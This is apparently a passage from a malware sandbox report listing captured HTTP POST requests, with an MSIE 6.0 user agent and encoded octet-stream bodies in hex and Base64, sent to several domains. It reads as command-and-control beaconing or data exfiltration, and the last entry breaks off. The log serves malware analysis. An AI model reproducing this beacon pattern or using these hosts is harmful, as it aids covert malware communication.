54 4c 67 5a 71 56 69 51 56 6b 63 42 4d 44 78 49 4c 4d 65 38 30 2f 58 38 6e 6d 65 53 79 4f 32 44 47 72 30 55 41 6c 4f 53 73 63 70 57 38 53 63 63 53 71 50 78 6e 51 6b 71 73 64 46 42 4a 64 33 37 46 68 73 61 35 47 74 52 65 70 6b 6d 6a 4c 74 5a 38 6d 4b 64 64 35 68 53 6a 68 54 43 6a 7a 77 54 4b 33 34 66 36 77 63 41 53 77 53 4f 30 7a 68 76 75 43 42 33 33 32 50 47 58 45 4a 38 4d 41 61 36 71 47 38 5a 4d 56 36 30 41 6a 56 55 37 35 53 78 70 42 66 65 51 41 37 61 6e 67 45 6a 7a 38 6e 58 62 4a 4e 66 6b 4e 36 74 49 71 78 55 68 37 76 37 42 5a 4a 58 71 4c 41 6e 63 79 76 6c 69 66 4c 71 73 4e 7a 35 68 34 79 4d 59 6a 57 79 6c 2b 67 4f 54 64 68 67 48 66 45 77 56 74 42 30 41 35 4f 38 79 36 50 75 50 57 6b 34 4c 4f 44 4e 55 2f 6d 6b 51 62 53 6c 46 52 4d 71 65 6e 67 50 33 69 44 4a 6e 46 39 2f 39 52 73 4e 71 37 35 57 55 37 34 79 57 79 46 4f 6f 6a 4e 66 68 37 4c 79 6a 78 77 71 33 4d 75 79 79 52 45 63 7a 34 4a 54 2b 67 47 4a 78 63 78 62 56 63 63 44 4c 42 77 4e 70 64 65 78 52 6e 2b 61 77 34 58 69 55 4e 73 78 36 53 2b 55 6c 51 38 68 4c 42 2b 41 3d 3d Data Ascii: 93FmfzaGjv8PLcS0kUhrG9kocmpWWGVQyrVUW/K4lj7AiHGu4qIskOp6Y66OAHdbOvHyLuvHoVuYTg8qSIuwk83/Y64998+foLYWYRAt3DAhepLhRFbexkyzLkckPlFu+Spzws1LjiEoj4dhd+uNwc4+ZQ2qlnYDc6yBlNv0U50QH4/L9o3n3BZuNfD3dBtsXHv2/tTLgZqViQVkcBMDxILMe80/X8nmeSyO2DGr0UAlOSscpW8SccSqPxnQkqsdFBJd37Fhsa5GtRepkmjLtZ8mKdd5hSjhTCjzwTK34f6wcASwSO0zhvuCB332PGXEJ8MAa6qG8ZMV60AjVU75SxpBfeQA7angEjz8nXbJNfkN6tIqxUh7v7BZJXqLAncyvlifLqsNz5h4yMYjWyl+gOTdhgHfEwVtB0A5O8y6PuPWk4LODNU/mkQbSlFRMqengP3iDJnF9/9RsNq75WU74yWyFOojNfh7Lyjxwq3MuyyREcz4JT+gGJxcxbVccDLBwNpdexRn+aw4XiUNsx6S+UlQ8hLB+A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 79 51 45 67 52 4b 66 70 6c 50 2b 36 2f 56 4c 45 56 6c 70 6d 58 58 42 75 48 71 49 64 45 7a 67 75 79 2f 38 57 48 44 38 46 68 42 51 38 65 4b 50 63 34 55 6b 31 42 38 6e 2f 53 2f 58 67 73 4a 66 4f 75 48 2f 34 61 35 41 67 76 77 4c 76 6d 36 56 7a 5a 65 68 56 32 5a 30 36 6e 46 55 5a 59 71 68 70 78 53 46 51 30 77 54 36 4b 69 50 53 6c 2b 4f 6a 71 6b 46 4f 2b 4c 78 79 35 68 46 59 6a 70 6a 41 59 73 63 6d 36 62 4f 66 75 78 6d 7a 6d 6f 4e 4e 46 31 68 75 59 51 41 2b 56 61 64 33 58 4f 35 64 4c 4a 52 73 31 61 33 57 47 6c 76 79 42 56 50 75 42 67 58 6c 4f 75 41 44 46 2f 43 31 57 37 37 70 49 73 61 36 31 35 36 79 6b 38 31 71 33 43 30 30 55 2b 6b 46 67 49 52 77 62 6b 57 63 2b 39 43 62 47 78 65 4f 65 67 48 59 31 51 42 45 45 32 50 43 4e 39 56 7a 30 68 31 31 58 77 6d 55 6f 6b 74 68 45 2b 7a 32 68 33 42 5a 41 71 43 48 58 72 67 43 49 59 67 62 70 36 31 41 4e 70 6f 31 6e 57 6e 58 43 33 6b 7a 2b 6c 4b 77 43 46 37 54 39 6e 46 4a 61 65 64 4a 32 41 56 34 32 4a 31 39 43 63 52 43 69 6e 61 56 70 6d 42 34 41 35 4c 6b 74 5a 59 51 6a 39 31 58 2f 6d 69 53 46 4f 57 70 74 56 6f 69 75 2b 63 67 50 73 4f 37 48 6f 50 42 73 75 73 78 6b 7a 44 31 6f 57 57 72 67 6b 6c 55 39 33 34 70 65 67 59 62 65 74 69 4a 43 74 6f 56 56 35 45 74 2f 68 4d 6b 4f 30 49 67 45 33 32 57 73 2b 74 4b 44 46 73 34 72 70 32 6d 64 78 4f 7a 69 62 34 4e 6c 66 6a 6a 48 34 49 5a 73 61 34 39 66 6e 39 37 4e 58 53 45 59 71 63 75 69 69 33 4e 34 53 31 46 59 77 61 72 57 49 73 70 6c 71 34 78 52 42 51 73 55 6d 70 47 51 42 33 6b 46 4b 66 32 32 35 6c 6e 62 57 4a 57 64 59 63 6a 77 50 78 6f 6a 6c 30 72 43 4b 4e 73 73 61 77 6b 2f 39 36 34 65 6e 68 2f 6f 4c 77 4f 4b 71 64 72 4b 57 63 3d Data Ascii: yQEgRKfplP+6/VLEVlpmXXBuHqIdEzguy/8WHD8FhBQ8eKPc4Uk1B8n/S/XgsJfOuH/4a5AgvwLvm6VzZehV2Z06nFUZYqhpxSFQ0wT6KiPSl+OjqkFO+Lxy5hFYjpjAYscm6bOfuxmzmoNNF1huYQA+Vad3XO5dLJRs1a3WGlvyBVPuBgXlOuADF/C1W77pIsa6156yk81q3C00U+kFgIRwbkWc+9CbGxeOegHY1QBEE2PCN9Vz0h11XwmUokthE+z2h3BZAqCHXrgCIYgbp61ANpo1nWnXC3kz+lKwCF7T9nFJaedJ2AV42J19CcRCinaVpmB4A5LktZYQj91X/miSFOWptVoiu+cgPsO7HoPBsusxkzD1oWWrgklU934pegYbetiJCtoVV5Et/hMkO0IgE32Ws+tKDFs4rp2mdxOzib4NlfjjH4IZsa49fn97NXSEYqcuii3N4S1FYwarWIsplq4xRBQsUmpGQB3kFKf225lnbWJWdYcjwPxojl0rCKNssawk/964enh/oLwOKqdrKWc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 74 62 55 31 66 4c 73 71 62 66 39 49 35 57 51 62 55 71 42 44 34 4b 53 51 70 45 66 42 53 31 58 45 48 2b 44 41 6e 6b 7a 35 6e 65 36 58 37 52 58 52 54 6f 7a 70 45 5a 70 47 76 44 4e 53 31 45 39 4c 77 42 69 2f 42 76 54 2f 30 50 30 71 6b 78 4f 39 52 42 63 70 4d 5a 69 31 4b 62 42 43 64 5a 46 56 2b 4a 50 4a 6d 6c 7a 57 77 71 78 33 49 62 77 67 32 4e 2b 32 73 34 4c 78 68 46 46 63 65 44 39 63 72 4c 53 79 6d 63 79 41 4c 33 77 6b 5a 72 6a 52 4a 37 53 51 6f 46 47 33 6f 64 4c 52 30 7a 35 5a 59 33 4f 4c 71 2b 4d 32 30 32 68 4d 76 49 56 71 43 33 56 69 54 42 74 69 45 70 36 6b 58 4f 30 34 56 74 4f 73 58 54 76 53 7a 65 54 62 4d 33 75 6f 57 4f 48 2b 47 6b 50 63 33 31 62 79 42 49 4d 43 47 45 54 52 70 77 4e 68 50 74 6a 2f 65 70 2b 54 37 69 38 49 59 79 38 4b 65 57 45 4e 30 76 79 72 67 48 56 65 51 30 72 6d 65 38 4a 61 69 6c 61 4d 70 6d 78 55 2b 61 70 5a 6e 65 47 57 57 56 75 74 6a 73 55 2b 43 37 42 41 52 69 77 36 57 48 7a 66 48 5a 71 7a 4d 5a 4d 38 4d 41 51 33 57 72 72 39 32 58 51 46 61 5a 36 6a 4a 76 76 41 37 2b 54 4e 66 74 37 78 4e 55 30 57 36 53 6e 4d 50 4d 4c 65 4a 65 7a 4e 72 4e 69 71 48 50 63 42 54 39 6a 73 36 30 31 71 5a 33 2f 49 64 53 68 70 39 79 37 77 73 6a 31 72 54 2f 6a 6a 69 68 6f 6b 33 38 5a 4a 5a 41 4f 4c 6b 41 56 61 54 52 66 72 78 38 71 36 46 4f 56 57 55 2f 59 39 6e 2f 64 62 31 36 5a 41 58 52 41 4e 6b 77 61 6c 47 32 42 6a 6a 39 7a 30 50 6b 6d 76 78 69 48 38 68 4c 79 34 71 45 70 4b 77 6e 46 44 6f 2f 4f 72 49 50 6c 4d 6d 54 4e 6f 37 47 77 74 49 79 58 73 2b 4c 7a 39 45 74 69 64 59 74 6e 63 4d 6d 61 63 6a 75 72 35 4b 53 6c 57 59 50 73 4e 53 66 48 48 38 55 74 44 4e 68 36 6f 77 41 65 55 69 2f 4b 6f 37 56 42 43 64 49 5a 47 55 37 54 44 6c 59 6b 56 39 36 55 4c 2f 6c 78 65 77 4a 55 4b 4f 2b 68 53 69 35 7a 46 6b 34 71 33 47 31 4e 4b 37 35 48 36 56 51 3d 3d Data Ascii: tbU1fLsqbf9I5WQbUqBD4KSQpEfBS1XEH+DAnkz5ne6X7RXRTozpEZpGvDNS1E9LwBi/BvT/0P0qkxO9RBcpMZi1KbBCdZFV+JPJmlzWwqx3Ibwg2N+2s4LxhFFceD9crLSymcyAL3wkZrjRJ7SQoFG3odLR0z5ZY3OLq+M202hMvIVqC3ViTBtiEp6kXO04VtOsXTvSzeTbM3uoWOH+GkPc31byBIMCGETRpwNhPtj/ep+T7i8IYy8KeWEN0vyrgHVeQ0rme8JailaMpmxU+apZneGWWVutjsU+C7BARiw6WHzfHZqzMZM8MAQ3Wrr92XQFaZ6jJvvA7+TNft7xNU0W6SnMPMLeJezNrNiqHPcBT9js601qZ3/IdShp9y7wsj1rT/jjihok38ZJZAOLkAVaTRfrx8q6FOVWU/Y9n/db16ZAXRANkwalG2Bjj9z0PkmvxiH8hLy4qEpKwnFDo/OrIPlMmTNo7GwtIyXs+Lz9EtidYtncMmacjur5KSlWYPsNSfHH8UtDNh6owAeUi/Ko7VBCdIZGU7TDlYkV96UL/lxewJUKO+hSi5zFk4q3G1NK75H6VQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 58 4c 62 41 67 51 50 71 6c 76 39 78 61 6c 4a 73 43 67 65 68 4d 69 79 37 73 62 4f 70 49 4b 4a 42 35 7a 63 48 55 37 36 67 4d 6e 71 4b 4b 4b 50 6e 45 46 4c 63 42 41 4a 64 6a 36 74 4c 74 43 4e 31 7a 34 31 4f 4e 79 71 64 62 78 39 35 63 33 72 72 72 54 30 46 59 4e 39 75 68 33 62 41 47 39 32 35 32 72 77 76 76 30 4d 55 54 6d 59 32 6b 66 4c 4f 32 54 6d 39 34 78 53 6d 6d 4d 2f 56 6f 33 39 76 43 59 71 59 4d 48 56 63 4d 43 39 64 4b 65 6b 49 4d 46 63 4c 73 65 78 39 69 65 6d 42 4a 69 71 4a 76 67 68 68 43 76 67 69 66 79 67 51 2f 74 2b 53 6b 68 31 31 7a 6f 31 4c 6a 46 30 36 74 33 6d 53 44 6d 4a 63 69 68 59 53 65 65 42 4e 6c 77 78 36 70 35 37 67 56 43 51 55 49 52 44 35 6c 56 67 4a 72 31 54 6b 35 6c 65 56 6d 44 4c 61 71 7a 59 4e 4b 45 48 42 4b 42 65 61 4b 6f 34 38 71 6e 37 53 45 5a 43 77 59 2f 30 4d 39 2f 72 6b 74 4a 2b 6c 51 5a 41 30 67 55 78 35 2b 64 56 2f 36 2b 4b 56 72 53 47 79 5a 45 4c 75 64 62 2f 47 51 7a 36 75 56 69 31 4c 42 6e 45 6e 6f 6a 54 6b 4a 65 52 42 4c 37 54 73 69 32 36 54 6e 54 6a 4e 63 77 30 45 2f 2b 39 73 57 35 4b 6e 56 6c 55 62 53 5a 71 57 61 58 5a 46 70 70 45 34 53 76 6c 48 56 4a 4d 4c 36 70 4a 4b 6f 43 55 46 62 79 62 6a 59 69 4e 65 49 4e 78 62 7a 6e 75 38 33 31 58 37 59 31 4a 73 74 77 5a 55 46 62 37 58 4a 6c 36 38 43 4a 74 69 63 2f 35 47 71 64 76 43 49 5a 64 71 31 46 46 52 70 70 72 66 56 38 32 56 53 59 57 79 71 6b 62 68 63 7a 61 74 49 58 4c 38 78 73 38 59 44 36 78 37 6c 2b 51 46 4a 55 73 44 4f 69 58 7a 77 43 70 67 41 57 4e 6d 46 39 49 32 47 71 50 53 65 6d 71 67 55 78 7a 78 58 74 61 68 4f 4f 49 2b 2b 4c 35 6d 6d 47 70 38 5a 2f 31 30 74 69 70 52 4f 75 52 2b 51 2f 58 78 6d 71 39 5a 65 51 38 64 70 30 34 62 70 52 33 46 33 63 5a 37 36 79 56 69 2b 72 76 38 73 71 55 77 6d 6f 78 64 63 30 6d 74 36 79 46 74 33 41 41 3d Data Ascii: XLbAgQPqlv9xalJsCgehMiy7sbOpIKJB5zcHU76gMnqKKKPnEFLcBAJdj6tLtCN1z41ONyqdbx95c3rrrT0FYN9uh3bAG9252rwvv0MUTmY2kfLO2Tm94xSmmM/Vo39vCYqYMHVcMC9dKekIMFcLsex9iemBJiqJvghhCvgifygQ/t+Skh11zo1LjF06t3mSDmJcihYSeeBNlwx6p57gVCQUIRD5lVgJr1Tk5leVmDLaqzYNKEHBKBeaKo48qn7SEZCwY/0M9/rktJ+lQZA0gUx5+dV/6+KVrSGyZELudb/GQz6uVi1LBnEnojTkJeRBL7Tsi26TnTjNcw0E/+9sW5KnVlUbSZqWaXZFppE4SvlHVJML6pJKoCUFbybjYiNeINxbznu831X7Y1JstwZUFb7XJl68CJtic/5GqdvCIZdq1FFRpprfV82VSYWyqkbhczatIXL8xs8YD6x7l+QFJUsDOiXzwCpgAWNmF9I2GqPSemqgUxzxXtahOOI++L5mmGp8Z/10tipROuR+Q/Xxmq9ZeQ8dp04bpR3F3cZ76yVi+rv8sqUwmoxdc0mt6yFt3AA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 79 51 45 67 52 4b 66 70 6c 50 2b 36 2f 56 4c 45 56 6c 70 6d 58 58 42 75 48 71 49 64 45 7a 67 75 79 2f 38 57 48 44 38 46 68 42 51 38 65 4b 50 63 34 55 6b 31 42 38 6e 2f 53 2f 58 67 73 4a 66 4f 75 48 2f 34 61 35 41 67 76 77 4c 76 6d 36 56 7a 5a 65 68 56 32 5a 30 36 6e 46 55 5a 59 71 68 70 78 53 46 51 30 77 54 36 4b 69 50 53 6c 2b 4f 6a 71 6b 46 4f 2b 4c 78 79 35 68 46 59 6a 70 6a 41 59 73 63 6d 36 62 4f 66 75 78 6d 7a 6d 6f 4e 4e 46 31 68 75 59 51 41 2b 56 61 64 33 58 4f 35 64 4c 4a 52 73 31 61 33 57 47 6c 76 79 42 56 50 75 42 67 58 6c 4f 75 41 44 46 2f 43 31 57 37 37 70 49 73 61 36 31 35 36 79 6b 38 31 71 33 43 30 30 55 2b 6b 46 67 49 52 77 62 6b 57 63 2b 39 43 62 47 78 65 4f 65 67 48 59 31 51 42 45 45 32 50 43 4e 39 56 7a 30 68 31 31 58 77 6d 55 6f 6b 74 68 45 2b 7a 32 68 33 42 5a 41 71 43 48 58 72 67 43 49 59 67 62 70 36 31 41 4e 70 6f 31 6e 57 6e 58 43 33 6b 7a 2b 6c 4b 77 43 46 37 54 39 6e 46 4a 61 65 64 4a 32 41 56 34 32 4a 31 39 43 63 52 43 69 6e 61 56 70 6d 42 34 41 35 4c 6b 74 5a 59 51 6a 39 31 58 2f 6d 69 53 46 4f 57 70 74 56 6f 69 75 2b 63 67 50 73 4f 37 48 6f 50 42 73 75 73 78 6b 7a 44 31 6f 57 57 72 67 6b 6c 55 39 33 34 70 65 67 59 62 65 74 69 4a 43 74 6f 56 56 35 45 74 2f 68 4d 6b 4f 30 49 67 45 33 32 57 73 2b 74 4b 44 46 73 34 72 70 32 6d 64 78 4f 7a 69 62 34 4e 6c 66 6a 6a 48 34 49 5a 73 61 34 39 66 6e 39 37 4e 58 53 45 59 71 63 75 69 69 33 4e 34 53 31 46 59 77 61 72 57 49 73 70 6c 71 34 78 52 42 51 73 55 6d 70 47 51 42 33 6b 46 4b 66 32 32 35 6c 6e 62 57 4a 57 64 59 63 6a 77 50 78 6f 6a 6c 30 72 43 4b 4e 73 73 61 77 6b 2f 39 36 34 65 6e 68 2f 6f 4c 77 4f 4b 71 64 72 4b 57 63 3d Data Ascii: yQEgRKfplP+6/VLEVlpmXXBuHqIdEzguy/8WHD8FhBQ8eKPc4Uk1B8n/S/XgsJfOuH/4a5AgvwLvm6VzZehV2Z06nFUZYqhpxSFQ0wT6KiPSl+OjqkFO+Lxy5hFYjpjAYscm6bOfuxmzmoNNF1huYQA+Vad3XO5dLJRs1a3WGlvyBVPuBgXlOuADF/C1W77pIsa6156yk81q3C00U+kFgIRwbkWc+9CbGxeOegHY1QBEE2PCN9Vz0h11XwmUokthE+z2h3BZAqCHXrgCIYgbp61ANpo1nWnXC3kz+lKwCF7T9nFJaedJ2AV42J19CcRCinaVpmB4A5LktZYQj91X/miSFOWptVoiu+cgPsO7HoPBsusxkzD1oWWrgklU934pegYbetiJCtoVV5Et/hMkO0IgE32Ws+tKDFs4rp2mdxOzib4NlfjjH4IZsa49fn97NXSEYqcuii3N4S1FYwarWIsplq4xRBQsUmpGQB3kFKf225lnbWJWdYcjwPxojl0rCKNssawk/964enh/oLwOKqdrKWc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 48 4b 76 6d 6b 55 4e 77 6c 2f 2b 78 6f 32 79 6a 53 6c 68 6c 68 47 78 62 53 51 4c 70 67 32 35 50 4a 2f 71 33 67 46 57 75 36 54 5a 4f 7a 4d 53 59 4d 74 73 57 38 30 63 38 4c 62 74 4f 65 61 62 71 57 75 30 6e 7a 41 4a 38 79 39 57 75 4f 6e 38 6c 64 4e 51 72 51 48 69 67 51 52 70 61 41 30 4c 56 43 79 45 67 2b 63 36 42 4c 74 6c 4f 36 47 47 55 68 76 4d 55 78 30 4e 59 77 47 4a 46 6e 63 55 6c 4b 63 2f 71 76 6a 68 38 55 79 2f 64 6b 66 2f 4f 51 77 4f 49 68 36 4d 59 32 34 2f 66 4a 2b 65 6f 70 65 49 4f 65 5a 39 4c 4d 34 5a 78 31 4d 50 33 76 36 53 39 48 53 4f 5a 5a 6f 45 48 43 38 4b 43 4b 55 6b 56 67 7a 5a 2f 47 52 38 73 58 43 33 54 57 46 72 6c 46 55 76 4f 61 51 58 6b 4c 38 4c 4a 46 46 55 70 77 51 43 6c 4c 33 67 34 46 64 51 71 49 4c 4e 76 71 53 68 2f 69 41 66 49 37 65 74 64 73 30 44 79 67 73 63 4d 73 70 7a 6d 59 77 4a 38 38 75 69 64 66 43 6b 67 79 32 4e 35 47 36 74 34 59 4f 52 57 54 6b 76 54 62 5a 55 69 74 66 73 55 50 42 37 52 7a 6c 54 74 58 78 75 55 36 4b 30 52 4a 2f 67 6e 43 47 71 57 78 42 4a 41 51 4b 58 54 51 71 41 57 68 48 2f 6d 69 62 61 53 71 52 6f 4f 4f 66 72 78 39 44 33 4c 33 34 51 63 63 2f 2f 43 74 68 39 63 70 79 6c 34 71 41 32 66 72 4f 46 65 63 79 4e 41 31 38 52 42 33 6c 78 47 69 4e 43 4a 61 30 43 41 39 49 76 48 61 55 36 33 5a 4e 7a 39 6f 48 76 6b 2f 6a 57 6d 53 50 58 41 4e 4d 46 31 6c 47 52 48 64 68 31 46 2f 6a 6d 76 37 4a 52 53 4c 56 66 6b 78 57 32 33 4c 65 4c 52 41 73 61 64 59 43 68 2b 6d 56 65 73 2b 75 54 71 5a 59 55 39 55 41 75 75 72 45 58 43 55 31 6e 47 75 54 47 2f 48 68 37 51 39 34 78 77 35 34 51 62 67 2f 38 54 6c 53 73 37 30 2f 39 36 72 70 77 53 52 41 32 75 54 79 43 59 63 52 54 4f 30 30 75 48 58 35 47 56 58 41 43 51 4c 64 51 45 4c 70 72 67 71 6e 61 70 61 59 36 30 5a 77 39 56 47 72 66 76 55 4a 36 4e 63 4f 61 65 55 42 54 4b 6e 59 6b 3d Data Ascii: HKvmkUNwl/+xo2yjSlhlhGxbSQLpg25PJ/q3gFWu6TZOzMSYMtsW80c8LbtOeabqWu0nzAJ8y9WuOn8ldNQrQHigQRpaA0LVCyEg+c6BLtlO6GGUhvMUx0NYwGJFncUlKc/qvjh8Uy/dkf/OQwOIh6MY24/fJ+eopeIOeZ9LM4Zx1MP3v6S9HSOZZoEHC8KCKUkVgzZ/GR8sXC3TWFrlFUvOaQXkL8LJFFUpwQClL3g4FdQqILNvqSh/iAfI7etds0DygscMspzmYwJ88uidfCkgy2N5G6t4YORWTkvTbZUitfsUPB7RzlTtXxuU6K0RJ/gnCGqWxBJAQKXTQqAWhH/mibaSqRoOOfrx9D3L34Qcc//Cth9cpyl4qA2frOFecyNA18RB3lxGiNCJa0CA9IvHaU63ZNz9oHvk/jWmSPXANMF1lGRHdh1F/jmv7JRSLVfkxW23LeLRAsadYCh+mVes+uTqZYU9UAuurEXCU1nGuTG/Hh7Q94xw54Qbg/8TlSs70/96rpwSRA2uTyCYcRTO00uHX5GVXACQLdQELprgqnapaY60Zw9VGrfvUJ6NcOaeUBTKnYk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=eb101e3c438c9a617e818a2e41f89d47|102.129.143.39|1678431278|1678431257|10|2|0; snkz=102.129.143.39Data Raw: 4c 72 71 37 66 77 4b 4a 6a 76 38 70 78 62 72 57 39 62 52 30 59 6f 56 52 46 56 77 53 6f 61 36 51 56 68 39 48 33 47 76 35 41 43 47 55 2b 69 77 66 34 68 35 4b 49 46 54 45 51 6b 56 6d 2f 35 48 48 66 50 31 30 34 2f 73 41 41 53 58 46 77 77 74 31 36 65 61 6d 68 4f 37 78 54 39 78 50 6c 53 63 59 75 68 30 4b 7a 72 62 4b 41 35 67 62 58 67 56 4e 48 4e 2b 58 4e 56 4a 49 42 77 78 4a 59 41 58 59 76 51 4d 36 67 5a 4e 71 4f 48 43 65 67 37 33 46 48 32 77 33 39 4e 42 66 61 7a 43 7a 70 55 68 71 59 7a 67 67 34 58 7a 32 46 4e 7a 35 56 38 64 55 2f 43 77 66 2b 56 7a 6a 2b 4a 34 41 74 50 4a 47 78 38 62 77 36 4c 4f 76 4f 6c 4b 6b 39 32 52 79 72 54 4a 4d 6e 2f 48 34 52 38 59 6e 47 6e 38 37 30 65 4f 41 37 32 47 53 55 2f 57 4c 32 4c 4e 4f 58 30 56 32 2f 41 4e 65 54 4d 4e 70 73 38 54 6c 66 49 59 6e 75 39 33 59 59 32 38 36 68 53 55 4d 63 46 30 35 52 59 74 6a 50 2b 4c 6f 47 62 7a 76 65 74 64 4a 34 39 70 61 70 4c 77 4b 66 72 32 68 2b 4c 6a 57 52 64 32 37 66 79 51 45 6a 7a 54 47 48 4c 39 2f 67 6b 48 42 61 75 32 6f 4b 6f 43 50 59 4b 44 6b 33 77 75 4c 44 65 44 36 45 63 6f 70 70 6a 79 62 6f 52 70 48 78 56 2b 6a 54 35 7a 6e 67 6a 54 53 6d 2f 77 72 63 34 51 55 52 75 65 68 49 38 73 56 75 6f 6a 70 42 56 44 75 49 4c 77 7a 39 5a 6c 6d 4b 34 57 39 71 48 44 34 42 74 6b 52 71 39 73 56 77 41 78 59 69 71 37 4d 43 4d 36 56 4e 6f 51 56 30 71 51 6e 58 6e 4c 6f 44 2f 39 62 4b 46 33 49 6c 66 56 74 76 58 69 74 4b 4c 72 70 32 6a 6c 71 73 4e 74 71 2f 6c 46 64 73 36 52 35 64 34 4b 44 4c 67 56 63 78 2f 4e 62 4a 6e 70 58 4c 7a 7a 49 35 54 68 61 50 62 4a 4e 62 6e 48 79 55 74 49 73 69 46 53 66 4d 45 2f 77 74 51 75 4a 72 5a 41 70 48 5a 6d 4c 53 2b 56 79 46 2b 70 76 43 6d 41 7a 64 69 43 2f 32 67 66 44 63 76 4e 51 6d 41 3d 3d Data Ascii: Lrq7fwKJjv8pxbrW9bR0YoVRFVwSoa6QVh9H3Gv5ACGU+iwf4h5KIFTEQkVm/5HHfP104/sAASXFwwt16eamhO7xT9xPlScYuh0KzrbKA5gbXgVNHN+XNVJIBwxJYAXYvQM6gZNqOHCeg73FH2w39NBfazCzpUhqYzgg4Xz2FNz5V8dU/Cwf+Vzj+J4AtPJGx8bw6LOvOlKk92RyrTJMn/H4R8YnGn870eOA72GSU/WL2LNOX0V2/ANeTMNps8TlfIYnu93YY286hSUMcF05RYtjP+LoGbzvetdJ49papLwKfr2h+LjWRd27fyQEjzTGHL9/gkHBau2oKoCPYKDk3wuLDeD6EcoppjyboRpHxV+jT5zngjTSm/wrc4QURuehI8sVuojpBVDuILwz9ZlmK4W9qHD4BtkRq9sVwAxYiq7MCM6VNoQV0qQnXnLoD/9bKF3IlfVtvXitKLrp2jlqsNtq/lFds6R5d4KDLgVcx/NbJnpXLzzI5ThaPbJNbnHyUtIsiFSfME/wtQuJrZApHZmLS+VyF+pvCmAzdiC/2gfDcvNQmA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 72 78 44 4c 55 74 79 7a 6e 66 38 53 57 50 77 34 42 37 32 57 6e 57 2f 33 4c 73 2f 30 56 56 6c 76 30 42 4b 54 66 31 33 48 49 79 65 51 78 35 38 59 32 79 63 68 72 2f 31 38 74 37 57 58 39 66 51 4f 6f 4a 72 57 41 43 51 72 6b 6c 44 63 31 47 49 31 57 57 6f 6e 32 67 6e 55 4a 32 61 51 5a 30 4f 78 66 43 73 47 4e 44 48 4a 6d 75 4b 2f 79 6e 4d 68 62 33 2f 33 6d 74 6a 65 67 69 72 66 69 48 4e 58 35 73 67 78 33 6e 64 4e 6d 37 32 6b 59 30 6f 48 45 76 2b 71 4f 38 6c 58 6e 36 4d 66 4f 59 52 42 6b 30 79 51 77 75 62 32 49 4a 34 67 42 59 58 56 63 54 68 4d 69 63 76 53 37 56 4d 57 47 5a 69 43 4e 6d 74 79 33 73 50 35 4e 4e 52 68 38 38 36 69 74 43 42 69 66 34 6f 4f 48 32 42 6e 62 77 70 54 47 32 74 6d 6a 6e 66 45 64 34 4b 37 64 68 4c 49 37 34 4c 38 41 68 50 2b 68 4f 5a 6d 55 64 63 31 48 2f 30 6f 7a 4d 4e 41 76 61 50 75 34 41 4b 55 4a 65 30 50 67 72 65 7a 4c 30 68 47 31 62 71 43 62 70 47 55 33 78 76 75 34 38 65 38 78 68 39 6a 34 6b 4a 63 57 45 42 55 6f 5a 51 30 73 55 71 39 2b 50 4c 70 66 7a 6c 38 6e 44 6b 76 42 6d 4a 6e 64 44 71 51 69 49 66 76 4d 54 62 32 46 70 54 32 4b 33 6d 54 75 4d 4a 39 30 32 36 32 47 43 5a 47 54 41 33 41 32 49 38 56 57 5a 6a 33 78 35 55 4c 5a 57 31 79 33 35 42 5a 51 74 34 73 68 50 74 73 43 67 48 2f 73 49 4d 7a 4e 34 59 74 74 62 32 75 4e 55 63 6e 71 62 48 44 64 35 51 78 41 56 4d 6e 48 38 38 4e 50 33 37 32 2f 59 4f 44 6b 53 59 66 59 38 56 5a 53 61 44 38 62 74 4c 47 78 32 6e 72 6a 41 4b 30 64 36 55 33 47 46 41 52 32 62 44 4e 37 4f 6f 2b 32 38 66 78 63 46 63 4e 2f 61 64 77 42 33 6e 31 53 6f 64 6c 2b 61 4b 56 6b 5a 38 33 43 55 4d 33 54 76 73 54 42 78 76 53 76 69 44 50 78 75 39 4b 47 6c 2f 44 Data Ascii: 